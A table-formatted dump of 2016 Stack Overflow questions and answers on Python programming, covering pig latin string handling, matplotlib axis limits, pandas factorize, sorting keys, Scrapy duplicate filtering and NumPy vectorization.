title | question_id | question_body | question_score | question_date | answer_id | answer_body | answer_score | answer_date | tags
---|---|---|---|---|---|---|---|---|---|
How do I find the first occurrence of a vowel and move it behind the original word (pig latin)? | 39,730,254 | <p>I need to find the first vowel of a string in python, and I'm a beginner. I'm instructed to move the characters before the first vowel to the end of the word and add '-ay'. For example "big" becomes "ig-bay" and "string" becomes "ing-stray" (piglatin, basically).</p>
<p>This is what I have so far:</p>
<pre><code>def convert(s):
    ssplit = s.split()
    beginning = ""
    for char in ssplit:
        if char in ('a','e','i','o','u'):
            end = ssplit[char:]
            strend = str(end)
        else:
            beginning = beginning + char
    return strend + "-" + beginning + "ay"
</code></pre>
<p>I need to find a way to stop the "if" statement from looking for further vowels after finding the first vowel - at least I think it's the problem. Thanks!</p>
| 2 | 2016-09-27T16:50:44Z | 39,730,323 | <p>Python has the <code>break</code> and <code>continue</code> statements for loop control. You can set a boolean flag when the first vowel is found and break out of the loop on it, along these lines:</p>
<pre><code>for char in word:
    if flag:
        break
    # do work on char
    # set flag = True when the first vowel is found
</code></pre>
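<p>As a concrete sketch of that pattern (my own illustration, not part of the original answer), applied to the pig-latin task:</p>

```python
def convert(word):
    beginning = ""
    end = ""
    found_vowel = False  # the boolean flag
    for i, char in enumerate(word):
        if char in "aeiou":
            found_vowel = True
            end = word[i:]
            break  # stop scanning after the first vowel
        beginning += char
    # fall back gracefully for words without vowels
    return end + "-" + beginning + "ay" if found_vowel else word + "-ay"

print(convert("string"))  # ing-stray
```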
| 0 | 2016-09-27T16:54:00Z | [
"python",
"findfirst"
]
|
39,730,383 | <p>You can use a <code>break</code> statement as soon as you find a vowel.
You also do not need any <code>split()</code> call here.
One big mistake was using <code>char</code> itself to slice the string; you need that character's index to take the substring instead.</p>
<p>Take a look at this:</p>
<pre><code>def convert(s):
    beginning = ""
    index = 0
    for char in s:
        if char in ('a','e','i','o','u'):
            end = str(s[index:])
            break
        else:
            beginning = beginning + char
        index = index + 1
    return str(end) + "-" + beginning + "ay"
</code></pre>
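<p>One caveat worth noting (my observation, not part of the original answer): if the word contains no vowel, <code>end</code> is never assigned and the final <code>return</code> raises an <code>UnboundLocalError</code>. A quick demonstration, using a self-contained copy of the function above:</p>

```python
def convert(s):
    beginning = ""
    index = 0
    for char in s:
        if char in ('a', 'e', 'i', 'o', 'u'):
            end = str(s[index:])
            break
        else:
            beginning = beginning + char
        index = index + 1
    return str(end) + "-" + beginning + "ay"

print(convert("big"))  # ig-bay
try:
    convert("nth")  # no vowel: "end" was never assigned
except UnboundLocalError as exc:
    print("needs handling:", exc)
```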
| 0 | 2016-09-27T16:57:09Z | [
"python",
"findfirst"
]
|
39,730,704 | <p>Break things down one step at a time.</p>
<p>Your first task is to find the first vowel. Let's do that:</p>
<pre><code>def first_vowel(s):
    for index, char in enumerate(s):
        if char in 'aeiou':
            return index
    raise ValueError('No vowel found')
</code></pre>
<p>Then you need to use that first vowel to split your word:</p>
<pre><code>def convert(s):
    index = first_vowel(s)
    return s[index:] + "-" + s[:index] + 'ay'
</code></pre>
<p>Then test it:</p>
<pre><code>print(convert('pig'))
print(convert('string'))
</code></pre>
<p>Full code, runnable, is here: <a href="https://repl.it/Dijj" rel="nofollow">https://repl.it/Dijj</a></p>
<p>The exception handling, for words that have no vowels, is left as an exercise.</p>
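<p>One possible way to do that exercise (my sketch, not the answer's code): catch the error and fall back to simply appending "-ay" to vowel-less words:</p>

```python
def first_vowel(s):
    for index, char in enumerate(s):
        if char in 'aeiou':
            return index
    raise ValueError('No vowel found')

def convert(s):
    try:
        index = first_vowel(s)
    except ValueError:
        return s + '-ay'  # one common convention for vowel-less words
    return s[index:] + "-" + s[:index] + 'ay'

print(convert('string'))  # ing-stray
print(convert('nth'))     # nth-ay
```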
| 1 | 2016-09-27T17:16:53Z | [
"python",
"findfirst"
]
|
39,730,922 | <p>Side note. You can use a regex:</p>
<pre><code>>>> import re
>>> cases=['big','string']
>>> for case in cases:
... print case+'=>', re.sub(r'^([^aeiou]*)(\w*)', '\\2-\\1ay', case)
...
big=> ig-bay
string=> ing-stray
</code></pre>
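<p>For reference (my addition, not in the original answer), the same substitution works unchanged in Python 3; only the <code>print</code> syntax differs:</p>

```python
import re

for case in ['big', 'string']:
    print(case + '=>', re.sub(r'^([^aeiou]*)(\w*)', r'\2-\1ay', case))
# big=> ig-bay
# string=> ing-stray
```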
| 0 | 2016-09-27T17:29:34Z | [
"python",
"findfirst"
]
|
How can I get the actual axis limits when using ax.axis('equal')? | 39,730,467 | <p>I am using <code>ax.axis('equal')</code> to make the axis spacing equal on X and Y, and also setting <code>xlim</code> and <code>ylim</code>. This over-constrains the problem and the actual limits are not what I set in <code>ax.set_xlim()</code> or <code>ax.set_ylim()</code>. Using <code>ax.get_xlim()</code> just returns what I provided. How can I get the actual visible limits of the plot?</p>
<pre><code>import matplotlib.pyplot as plt
from numpy import array

f,ax=plt.subplots(1) #open a figure
ax.axis('equal') #make the axes have equal spacing
ax.plot([0,20],[0,20]) #test data set
#change the plot axis limits
ax.set_xlim([2,18])
ax.set_ylim([5,15])
#read the plot axis limits
xlim2=array(ax.get_xlim())
ylim2=array(ax.get_ylim())
#define indices for drawing a rectangle with xlim2, ylim2
sqx=array([0,1,1,0,0])
sqy=array([0,0,1,1,0])
#plot a thick rectangle marking the xlim2, ylim2
ax.plot(xlim2[sqx],ylim2[sqy],lw=3) #this does not go all the way around the edge
</code></pre>
<p>What commands will let me draw the green box around the actual edges of the figure? </p>
<p><a href="http://i.stack.imgur.com/Z14Jg.png" rel="nofollow"><img src="http://i.stack.imgur.com/Z14Jg.png" alt="Plot showing that the results of get_xlim() and get_ylim() do not match the visible bounds of the figure"></a></p>
<p>Related: <a href="http://stackoverflow.com/questions/39775709/how-to-enforce-both-xlim-and-ylim-while-using-ax-axesequal/39795483#39795483" title="Force xlim, ylim, and axes('equal') at the same time by letting margins auto-adjust">Force <code>xlim</code>, <code>ylim</code>, and <code>axes('equal')</code> at the same time by letting margins auto-adjust</a> </p>
| 2 | 2016-09-27T17:02:07Z | 39,845,124 | <p>The actual limits are not known until the figure is drawn. By adding a canvas draw after setting the <code>xlim</code> and <code>ylim</code>, but before obtaining the <code>xlim</code> and <code>ylim</code>, then one can get the desired limits.</p>
<pre><code>import matplotlib.pyplot as plt
from numpy import array

f,ax=plt.subplots(1) #open a figure
ax.axis('equal') #make the axes have equal spacing
ax.plot([0,20],[0,20]) #test data set
#change the plot axis limits
ax.set_xlim([2,18])
ax.set_ylim([5,15])
#Drawing is crucial
f.canvas.draw() #<---------- I added this line
#read the plot axis limits
xlim2=array(ax.get_xlim())
ylim2=array(ax.get_ylim())
#define indices for drawing a rectangle with xlim2, ylim2
sqx=array([0,1,1,0,0])
sqy=array([0,0,1,1,0])
#plot a thick rectangle marking the xlim2, ylim2
ax.plot(xlim2[sqx],ylim2[sqy],lw=3)
</code></pre>
<p><a href="http://i.stack.imgur.com/v4XJd.png" rel="nofollow"><img src="http://i.stack.imgur.com/v4XJd.png" alt="Figure produced by script"></a></p>
| 1 | 2016-10-04T05:59:20Z | [
"python",
"python-2.7",
"matplotlib",
"plot"
]
|
40,049,860 | <p>Not to detract from the accepted answer, which does solve the problem of getting updated axis limits, but is this perhaps an example of the XY problem? If what you want to do is draw a box around the axes, then you don't actually <em>need</em> the <code>xlim</code> and <code>ylim</code> in data coordinates. Instead, you just need to use the <code>ax.transAxes</code> transform which causes both <code>x</code> and <code>y</code> data to be interpreted in normalized coordinates instead of data-centered coordinates:</p>
<pre><code>ax.plot([0,0,1,1,0],[0,1,1,0,0], lw=3, transform=ax.transAxes)
</code></pre>
<p>The great thing about this is that your line will stay around the edges of the axes <strong><em>even if the <code>xlim</code> and <code>ylim</code> subsequently change</em></strong>.</p>
<p>You can also use <code>transform=ax.xaxis.get_transform()</code> or <code>transform=ax.yaxis.get_transform()</code> if you want only <code>x</code> or only <code>y</code> to be defined in normalized coordinates, with the other one in data coordinates.</p>
| 1 | 2016-10-14T18:29:40Z | [
"python",
"python-2.7",
"matplotlib",
"plot"
]
|
Convert column's data to enumerated dictionary key-value | 39,730,468 | <p>Is there a better way (in the sense of minimal code) to do the following: convert a column to enumerated numerical values? It should go somewhat like this:</p>
<ol>
<li>get a <strong>set</strong> of items in a column</li>
<li>make an <strong>enumerated dictionary</strong> with key-value pairs</li>
<li>swap the keys and values</li>
<li>use the key-value result instead of the data in a new column.</li>
</ol>
<p>So here's what I do today; I wonder if anyone can show a more classic way to do it, so I can avoid writing the function <em>get_color_val</em>:</p>
<pre><code>import pandas as pd
cars = pd.DataFrame({"car_name": ["BMW","BMW","ACCURA","ACCURA","ACCURA","BMW","BMW","BMW"],"color":["RED","RED","RED","RED","GREEN","BLACK","BLUE","BLUE"]})
color_dict = dict(enumerate(set(cars["color"])))
color_dict = dict((y,x) for x,y in color_dict.iteritems())
def get_color_val(row):
    my_key = row["color"]
    my_value = color_dict.get(my_key)
    return my_value
cars["color_val"] = cars.apply(get_color_val, axis=1)
cars = cars.drop("color",1)
print cars
</code></pre>
<blockquote>
<p>Result</p>
</blockquote>
<pre><code>Before------------
car_name color
0 BMW RED
1 BMW RED
2 ACCURA RED
3 ACCURA RED
4 ACCURA GREEN
5 BMW BLACK
6 BMW BLUE
7 BMW BLUE
After------------
car_name color_val
0 BMW 3
1 BMW 3
2 ACCURA 3
3 ACCURA 3
4 ACCURA 2
5 BMW 1
6 BMW 0
7 BMW 0
</code></pre>
| 2 | 2016-09-27T17:02:16Z | 39,730,516 | <p>I would use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.factorize.html" rel="nofollow">pd.factorize()</a> in this case:</p>
<pre><code>In [8]: cars['color_val'] = pd.factorize(cars.color)[0]
In [9]: cars
Out[9]:
car_name color color_val
0 BMW RED 0
1 BMW RED 0
2 ACCURA RED 0
3 ACCURA RED 0
4 ACCURA GREEN 1
5 BMW BLACK 2
6 BMW BLUE 3
7 BMW BLUE 3
</code></pre>
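<p>A detail worth knowing (my note, beyond the answer above): <code>pd.factorize</code> also returns the array of unique labels as its second value, so the numeric codes can be mapped back to the original colors:</p>

```python
import pandas as pd

colors = pd.Series(["RED", "RED", "GREEN", "BLACK", "BLUE", "BLUE"])
codes, uniques = pd.factorize(colors)
print(list(codes))            # [0, 0, 1, 2, 3, 3]
print(list(uniques))          # ['RED', 'GREEN', 'BLACK', 'BLUE']
print(list(uniques[codes]))   # round-trips back to the original labels
```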
| 3 | 2016-09-27T17:05:17Z | [
"python",
"pandas",
"dictionary",
"dataframe",
"enumeration"
]
|
python sorting error: TypeError: 'list' object is not callable | 39,730,477 | <p>I am trying to sort a list of list based on the first item of each element:</p>
<pre><code>def getKey(item):
    return item[0]

def myFun(x):
    return sorted(x, key= getKey(x))
my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p>I want the sorting based on the first item of each element, i.e. 1, 5 and 3. The expected result should be: <code>[[1,100], [3,30], [5,200]]</code></p>
<p>However, I got the error below:</p>
<pre><code>TypeErrorTraceback (most recent call last)
<ipython-input-7-4c88bbc1a944> in <module>()
3
4 my_x = [[1,100], [5,200], [3,30]]
----> 5 myFun(my_x)
<ipython-input-7-4c88bbc1a944> in myFun(x)
1 def myFun(x):
----> 2 return sorted(x, key= getKey(x))
3
4 my_x = [[1,100], [5,200], [3,30]]
5 myFun(my_x)
TypeError: 'list' object is not callable
</code></pre>
<p>Any idea what I did wrong here? Thanks!</p>
| -3 | 2016-09-27T17:02:41Z | 39,730,492 | <p><strong>UPDATE</strong></p>
<p><code>sorted</code>'s <code>key</code> argument should be callable, so instead of passing <code>key=getKey(x)</code> you need to pass <code>key=getKey</code>.</p>
<p><strong>INITIAL ANSWER</strong> (could be useful if you want to make the code look better):</p>
<p><del>There is no such method as <code>getKey</code>, but</del> there is <a href="https://docs.python.org/2/library/operator.html#operator.itemgetter" rel="nofollow"><code>itemgetter</code></a> from <a href="https://docs.python.org/2/library/operator.html#operator" rel="nofollow"><code>operator</code></a> package</p>
<pre><code>from operator import itemgetter

def myFun(x):
    return sorted(x, key=itemgetter(0))

my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p><strong>To the downvoters</strong>:</p>
<p>It's clearly said that</p>
<blockquote>
<p>I want the sorting based on the first item of each element</p>
</blockquote>
<p>And if you think that you could sort the presented list with plain <code>sorted()</code> alone and get the same result, you are wrong.</p>
<pre><code>>>> my_x = [[1,100], [5,200], [3,30], [1,30]]
>>> myFun(my_x)
[[1, 100], [1, 30], [3, 30], [5, 200]]
>>> sorted(my_x)
[[1, 30], [1, 100], [3, 30], [5, 200]]
</code></pre>
<p>So <code>sorted</code> on its own is not based only on the first element, which is what the OP wanted.</p>
<p><strong>INITIAL ANSWER'S UPDATE</strong> </p>
<p>Also, when I answered there was no <code>getKey</code> function; you can look at the <a href="http://stackoverflow.com/posts/39730477/revisions">OP post edit history</a>.</p>
<p>Now that the OP's post has the <code>getKey</code> function, you can look at the appropriate <a href="http://stackoverflow.com/a/39730625/3124746">answer</a> by @MosesKoledoye.</p>
| -1 | 2016-09-27T17:03:43Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
39,730,625 | <p>You don't need to call the function <code>getKey</code>. The signature of <a href="https://docs.python.org/2/library/functions.html#sorted" rel="nofollow"><code>sorted</code></a> requires you pass the <code>key</code> argument as a callable:</p>
<pre><code>sorted(x, key=getKey)
</code></pre>
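<p>Putting the fix together as a runnable whole (my restatement):</p>

```python
def getKey(item):
    return item[0]

def myFun(x):
    return sorted(x, key=getKey)  # pass the function itself; don't call it

my_x = [[1, 100], [5, 200], [3, 30]]
print(myFun(my_x))  # [[1, 100], [3, 30], [5, 200]]
```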
| 2 | 2016-09-27T17:11:39Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
39,730,628 | <p>The problem is that you're passing the result of calling <code>getKey(x)</code> as the <code>key</code> argument. You want to pass the function itself.</p>
<pre><code>def getKey(item):
    return item[0]

def myFun(x):
    return sorted(x, key=getKey)

my_x = [[1,100], [5,200], [3,30]]
myFun(my_x)
</code></pre>
<p>Having said that, if you're just sorting based on the first element, that's the default behavior of <code>sorted</code>.</p>
<p>You can just do <code>sorted(x)</code>.</p>
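<p>To illustrate that last point (my example): for lists of lists, plain <code>sorted</code> compares element by element starting from the first item, so it already produces the expected result here:</p>

```python
my_x = [[1, 100], [5, 200], [3, 30]]
print(sorted(my_x))  # [[1, 100], [3, 30], [5, 200]]
```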
| 3 | 2016-09-27T17:11:54Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
39,730,750 | <p><code>getKey</code> is a function (a type of "callable" object). Its output, <code>getKey(x)</code>, on the other hand, is a <code>list</code> object, which is <em>not</em> callable. Your mistake is that you're setting <code>key=getKey(x)</code> and hence assigning a <code>list</code> object to the argument <code>key</code>, whereas <code>sorted</code> expects something callable attached to that name. That explains why, when the internal sorting code tries to call your <code>key</code>, it fails with the error "'list' object is not callable". Really, you should have just said <code>key=getKey</code>.</p>
| 1 | 2016-09-27T17:20:19Z | [
"python",
"list",
"python-2.7",
"sorting"
]
|
import python packages from another directory into a Django project | 39,730,489 | <p>I have a Django project where a user uploads some images and I have some image processing routines which I write and they reside in a completely different folder in my hard drive (on the same machine).</p>
<p>Now, I plan to use something like celery to process these images. So, the idea would be that as soon as the files get uploaded, I can start some celery task which would process these images.</p>
<p>Now, I was wondering how I can change my Django settings so that these image processing routines are available from within my Django project? So, my image processing project has the following structure:</p>
<pre><code>ip
--- calibration
--- io
--- report
--- utils
</code></pre>
<p>So from my django project, I hope to be able to do something like:</p>
<pre><code>from io import *
</code></pre>
<p>and be able to use the classes defined there.</p>
| 0 | 2016-09-27T17:03:18Z | 39,730,605 | <p>You must append the folder to your Python path using <code>sys.path.append()</code>, then import using the module name as normal.</p>
<p><a href="http://www.johnny-lin.com/cdat_tips/tips_pylang/path.html" rel="nofollow">Credit</a></p>
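<p>A minimal sketch of that approach (the path below is hypothetical; point it at the folder that <em>contains</em> the <code>ip</code> package, and make sure each subfolder has an <code>__init__.py</code> so it is importable as a package):</p>

```python
import sys

# Hypothetical location of the folder containing the "ip" package
sys.path.append('/home/user/projects')

# Afterwards the package imports like any installed module, e.g.:
# from ip import utils
# from ip.io import SomeClass
```

<p>Note that a bare <code>from io import *</code> risks colliding with the standard library's <code>io</code> module; importing through the <code>ip</code> package namespace avoids that.</p>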
| 2 | 2016-09-27T17:09:59Z | [
"python",
"django"
]
|
Create a subclass of list without deep copy | 39,730,524 | <p>I want to subclass <code>list</code> to add some function to it, for example, <code>my_func</code>. </p>
<p>Is there a way to do this without copying the whole list, i.e. make a shallow copy, on the creation of the <code>MyList</code> object and let <code>MyList</code> reference the same list as the one used to construct it?</p>
<pre><code>class MyList(list):
    def my_func(self):
        # do some stuff
        return self
l1 = list(range(10))
l2 = MyList(l1)
print(l1)
print(l2)
l1[3] = -5
print(l1)
print(l2)
</code></pre>
| 4 | 2016-09-27T17:05:40Z | 39,730,690 | <p>Pretty sure this isn't possible with a <code>list</code> subclass. It <em>is</em> possible with a <strong><a href="https://docs.python.org/3/library/collections.html#collections.UserList" rel="nofollow"><code>collections.UserList</code></a></strong> subclass (simply <em><a href="https://docs.python.org/2.7/library/userdict.html#module-UserList" rel="nofollow"><code>UserList</code></a></em> in Python <code>2</code>):</p>
<pre><code>from collections import UserList

class MyList(UserList):
    def __init__(self, it=None):
        # keep reference only for list instances
        if isinstance(it, list):
            self.data = it
        else:
            super().__init__(it)

    def my_func(self):
        # do some stuff
        return self
</code></pre>
<p>The fact that <code>UserList</code> exposes a <a href="https://docs.python.org/3/library/collections.html#collections.UserList.data" rel="nofollow"><strong><code>data</code></strong></a> attribute containing the actual list instance makes it easy for us to replace it with the iterable <code>it</code> and essentially just drop the supplied argument there and <em>retain the reference</em>:</p>
<p>By initializing as you did: </p>
<pre><code>l1 = list(range(10))
l2 = MyList(l1)
print(l1, l2, sep='\n')
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
</code></pre>
<p>and then mutating:</p>
<pre><code>l1[3] = -5
</code></pre>
<p>The <code>data</code> attribute referencing <code>l1</code> is, of course, mutated:</p>
<pre><code>print(l1, l2, sep='\n')
[0, 1, 2, -5, 4, 5, 6, 7, 8, 9]
[0, 1, 2, -5, 4, 5, 6, 7, 8, 9]
</code></pre>
| 4 | 2016-09-27T17:15:56Z | [
"python",
"list",
"python-3.x",
"oop",
"inheritance"
]
|
TypeError: Signature mismatch. Keys must be dtype <dtype: 'string'>, got <dtype:'int64'> | 39,730,528 | <p>While running the wide_n_deep_tutorial program from TensorFlow <a href="https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/learn/wide_n_deep_tutorial.py" rel="nofollow">https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/learn/wide_n_deep_tutorial.py</a> on my dataset, the following error is displayed.</p>
<pre><code>"TypeError: Signature mismatch. Keys must be dtype <dtype: 'string'>, got <dtype:'int64'>"
</code></pre>
<p><a href="http://i.stack.imgur.com/aqs3x.png" rel="nofollow">Screenshot of the full error traceback</a></p>
<p>Following is the code snippet:</p>
<pre><code>def input_fn(df):
  """Input builder function."""
  # Creates a dictionary mapping from each continuous feature column name (k) to
  # the values of that column stored in a constant Tensor.
  continuous_cols = {k: tf.constant(df[k].values) for k in CONTINUOUS_COLUMNS}
  # Creates a dictionary mapping from each categorical feature column name (k)
  # to the values of that column stored in a tf.SparseTensor.
  categorical_cols = {k: tf.SparseTensor(
      indices=[[i, 0] for i in range(df[k].size)],
      values=df[k].values,
      shape=[df[k].size, 1])
      for k in CATEGORICAL_COLUMNS}
  # Merges the two dictionaries into one.
  feature_cols = dict(continuous_cols)
  feature_cols.update(categorical_cols)
  # Converts the label column into a constant Tensor.
  label = tf.constant(df[LABEL_COLUMN].values)
  # Returns the feature columns and the label.
  return feature_cols, label

def train_and_eval():
  """Train and evaluate the model."""
  train_file_name, test_file_name = maybe_download()
  df_train = train_file_name
  df_test = test_file_name
  df_train[LABEL_COLUMN] = (
      df_train["impression_flag"].apply(lambda x: "generated" in x)).astype(str)
  df_test[LABEL_COLUMN] = (
      df_test["impression_flag"].apply(lambda x: "generated" in x)).astype(str)
  model_dir = tempfile.mkdtemp() if not FLAGS.model_dir else FLAGS.model_dir
  print("model directory = %s" % model_dir)
  m = build_estimator(model_dir)
  print('model succesfully build!')
  m.fit(input_fn=lambda: input_fn(df_train), steps=FLAGS.train_steps)
  print('model fitted!!')
  results = m.evaluate(input_fn=lambda: input_fn(df_test), steps=1)
  for key in sorted(results):
    print("%s: %s" % (key, results[key]))
</code></pre>
<p>Any help is appreciated.</p>
| 0 | 2016-09-27T17:05:54Z | 39,747,378 | <p>It would help to see the output prior to the error message, to determine which part of the process tripped this error. Still, the message says quite clearly that the key is expected to be a string whereas an integer was given instead. I am only guessing, but are the column names set out correctly in the earlier part of your script? They could potentially be the keys being referred to in this instance.</p>
| 0 | 2016-09-28T12:21:50Z | [
"python",
"pandas",
"tensorflow"
]
|
39,837,247 | <p>Judging by <a href="http://i.stack.imgur.com/aqs3x.png" rel="nofollow">your traceback</a>, the problem you're having is caused by your inputs to feature columns, or the output of your <code>input_fn</code>. Your sparse tensors are most likely being fed non-string dtypes for the <code>values</code> parameter; sparse feature columns expect string values. Ensure that you're feeding the correct data, and if you're sure you are, you can try the following:</p>
<pre><code>categorical_cols = {k: tf.SparseTensor(
indices=[[i, 0] for i in range(df[k].size)],
values=df[k].astype(str).values, # Convert sparse values to string type
shape=[df[k].size, 1])
for k in CATEGORICAL_COLUMNS}
</code></pre>
| 0 | 2016-10-03T17:33:03Z | [
"python",
"pandas",
"tensorflow"
]
|
Scrapy - Filtered duplicate request | 39,730,566 | <p>I'm working with scrapy. I want to loop through a db table and grab the starting page for each scrape (random_form_page), then yield a request for each start page. Please note that I am hitting an api to get a proxy with the initial request. I want to set up each request to have its own proxy, so using the callback model I have: </p>
<pre><code>def start_requests(self):
    for x in xrange(8):
        random_form_page = session.query(....

        PR = Request(
            'htp://my-api',
            headers=self.headers,
            meta={'newrequest': Request(random_form_page, headers=self.headers)},
            callback=self.parse_PR
        )
        yield PR
</code></pre>
<p>I notice:</p>
<pre><code>[scrapy] DEBUG: Filtered duplicate request: <GET 'htp://my-api'> - no more duplicates will be shown (see DUPEFILTER_DEBUG to show all duplicates)
</code></pre>
<p>In my code I can see that although it loops through 8 times it only yields a request for the first page. The others I assume are being filtered out. I've looked at <a href="http://doc.scrapy.org/en/latest/topics/settings.html#dupefilter-class" rel="nofollow">http://doc.scrapy.org/en/latest/topics/settings.html#dupefilter-class</a> but still unsure how to turn off this filtering action. How can I turn off the filtering?</p>
| 0 | 2016-09-27T17:07:54Z | 39,731,805 | <p>Use <code>dont_filter=True</code> in the <code>Request</code> object:</p>
<pre><code>def start_requests(self):
    for x in xrange(8):
        random_form_page = session.query(....

        PR = Request(
            'htp://my-api',
            headers=self.headers,
            meta={'newrequest': Request(random_form_page, headers=self.headers)},
            callback=self.parse_PR,
            dont_filter = True
        )
        yield PR
</code></pre>
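<p>For completeness (my addition, not part of the answer above): duplicate filtering can also be disabled globally by swapping the dupefilter class in <code>settings.py</code>, though the per-request <code>dont_filter=True</code> shown here is usually the better-targeted fix:</p>

```python
# settings.py
# BaseDupeFilter performs no filtering at all
DUPEFILTER_CLASS = 'scrapy.dupefilters.BaseDupeFilter'
```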
| 1 | 2016-09-27T18:24:41Z | [
"python",
"scrapy"
]
|
Trying to Remove for-Loops from Python code, Performing Operations with a Look-up Table On Matrices | 39,730,616 | <p>I feel like this is a similar problem to the one I asked before, but I can't figure it out. How can I convert these two lines of code into one line with no for-loop?</p>
<pre><code>for i in xrange(X.shape[0]):
dW[:,y[i]] -= X[i]
</code></pre>
<p>In English, every row in matrix X should be subtracted from a corresponding column in matrix dW given by the vector y.</p>
<p>I should mention dW is DxC and X is NxD, so the transpose of X does not have the same shape as dW; otherwise I could re-order the rows of X and take the transpose directly. However, it is possible for the columns in dW to have multiple corresponding rows which need to be subtracted.</p>
<p>I feel like I do not have a firm grasp of how indexing in python is supposed to work, which makes it difficult to remove unnecessary for-loops, or even to know what for-loops are possible to remove. </p>
| 0 | 2016-09-27T17:10:47Z | 39,730,962 | <p><strong>Approach #1</strong> Here's a one-liner vectorized approach with <code>matrix-multiplication</code> using <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html" rel="nofollow"><code>np.dot</code></a> and <a href="http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html" rel="nofollow"><code>NumPy broadcasting</code></a> -</p>
<pre><code>dWout -= (np.arange(dW.shape[1])[:,None] == y).dot(X).T
</code></pre>
<p><strong>Explanation :</strong> Take a small example to understand what's going on -</p>
<p>Inputs :</p>
<pre><code>In [259]: X
Out[259]:
array([[ 0.80195208, 0.40566743, 0.62585574, 0.53571781],
[ 0.56643339, 0.4635662 , 0.4290103 , 0.14457036],
[ 0.31823491, 0.12329964, 0.41682841, 0.09544716]])
In [260]: y
Out[260]: array([1, 2, 2])
</code></pre>
<p>First off, we create the 2D mask of <code>y</code> indices spread across the length of dW's second axis.</p>
<p>Let <code>dW</code> be a <code>4 x 5</code> shaped array. So, the mask would be :</p>
<pre><code>In [261]: mask = (np.arange(dW.shape[1])[:,None] == y)
In [262]: mask
Out[262]:
array([[False, False, False],
[ True, False, False],
[False, True, True],
[False, False, False],
[False, False, False]], dtype=bool)
</code></pre>
<p>This is using <a href="http://docs.scipy.org/doc/numpy/user/basics.broadcasting.html" rel="nofollow"><code>NumPy broadcasting</code></a> here to create a <code>2D</code> mask.</p>
<p>Next up, we use matrix-multiplication to sum-aggregate the same indices from <code>y</code> -</p>
<pre><code>In [264]: mask.dot(X)
Out[264]:
array([[ 0. , 0. , 0. , 0. ],
[ 0.80195208, 0.40566743, 0.62585574, 0.53571781],
[ 0.8846683 , 0.58686584, 0.84583872, 0.24001752],
[ 0. , 0. , 0. , 0. ],
[ 0. , 0. , 0. , 0. ]])
</code></pre>
<p>Thus, corresponding to the third row of the mask that has <code>True</code> values at second and third columns, we would sum up the second and third rows from <code>X</code> with that matrix-multiplication. This would be put as the third row in the multiplication output.</p>
<p>Since, in the original loopy code we are updating <code>dW</code> across columns, we need to transpose the multiplication result and then update.</p>
<hr>
<p><strong>Approach #2</strong> Here's another vectorized way, though not a one-liner using <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.ufunc.at.html" rel="nofollow"><code>np.add.reduceat</code></a> -</p>
<pre><code>sidx = y.argsort()
unq,shift_idx = np.unique(y[sidx],return_index=True)
dWout[:,unq] -= np.add.reduceat(X[sidx],shift_idx,axis=0).T
</code></pre>
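<p>Without NumPy at hand, the mask-then-matrix-multiply step is just a sum-by-label. A small integer sketch of what mask.dot(X) computes (toy values, not the arrays above; integers keep the sums exact):</p>

```python
X = [[8, 4], [5, 4], [3, 1]]   # 3 rows of X
y = [1, 2, 2]                  # column of dW each row belongs to
n_cols = 5                     # dW.shape[1]

# mask[c][i] == 1 exactly when y[i] == c -- the broadcasted comparison
mask = [[1 if y[i] == c else 0 for i in range(len(y))] for c in range(n_cols)]

# mask.dot(X): row c accumulates every row of X whose label is c
agg = [[sum(mask[c][i] * X[i][j] for i in range(len(X)))
        for j in range(len(X[0]))] for c in range(n_cols)]

print(agg[1])  # [8, 4] -> row 0 of X
print(agg[2])  # [8, 5] -> rows 1 and 2 of X summed
```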
| 1 | 2016-09-27T17:31:37Z | [
"python",
"numpy",
"matrix",
"indexing",
"vectorization"
]
|
Trying to Remove for-Loops from Python code, Performing Operations with a Look-up Table On Matrices | 39,730,616 | <p>I feel like this is a similar problem to the one I asked before, but I can't figure it out. How can I convert these two lines of code into one line with no for-loop?</p>
<pre><code>for i in xrange(X.shape[0]):
dW[:,y[i]] -= X[i]
</code></pre>
<p>In English, every row in matrix X should be subtracted from a corresponding column in matrix dW given by the vector y.</p>
<p>I should mention dW is DXC and X is NXD, so the transpose of X does not have the same shape as W, otherwise I could re-order the the rows of X, and take the transpose directly. However, it is possible for the columns in dW to have multiple corresponding rows which need to be subtracted.</p>
<p>I feel like I do not have a firm grasp of how indexing in python is supposed to work, which makes it difficult to remove unnecessary for-loops, or even to know what for-loops are possible to remove. </p>
| 0 | 2016-09-27T17:10:47Z | 39,732,328 | <p>The straightforward way to vectorize would be:</p>
<pre><code>dW[:,y] -= X.T
</code></pre>
<p>Except, though not very obvious or well-documented, this will give problems with repeated indices in <code>y</code>. For these situations there is the <code>ufunc.at</code> method (elementwise operations in numpy are implemented as "ufunc's" or "universal functions"). Quote from <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.ufunc.at.html" rel="nofollow">the docs</a>:</p>
<blockquote>
<p>ufunc.at(a, indices, b=None)</p>
<p>Performs unbuffered in place operation on operand âaâ for elements specified by âindicesâ. For addition ufunc, this method is equivalent to a[indices] += b, except that results are accumulated for elements that are indexed more than once. For example, a[[0,0]] += 1 will only increment the first element once because of buffering, whereas add.at(a, [0,0], 1) will increment the first element twice.</p>
</blockquote>
<p>So in your case:</p>
<pre><code>np.subtract.at(dW.T, y, X)
</code></pre>
<p>Unfortunately, <code>ufunc.at</code> is relatively inefficient as far as vectorization techniques go, so the speedup compared to the loop might not be that impressive.</p>
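<p>The buffering issue is easiest to see on a single column with a repeated index. A plain-Python sketch of the two semantics (toy numbers; with fancy-index assignment, in practice the last write wins):</p>

```python
start = 10.0
y = [0, 0]        # the same dW column indexed twice
X = [1.0, 2.0]

# Buffered fancy indexing, dW[:, y] -= X.T: every write is computed
# from the original value, so effectively only one subtraction survives.
buffered = start - X[-1]

# np.subtract.at(dW.T, y, X): repeated indices accumulate.
accumulated = start
for xi in X:
    accumulated -= xi

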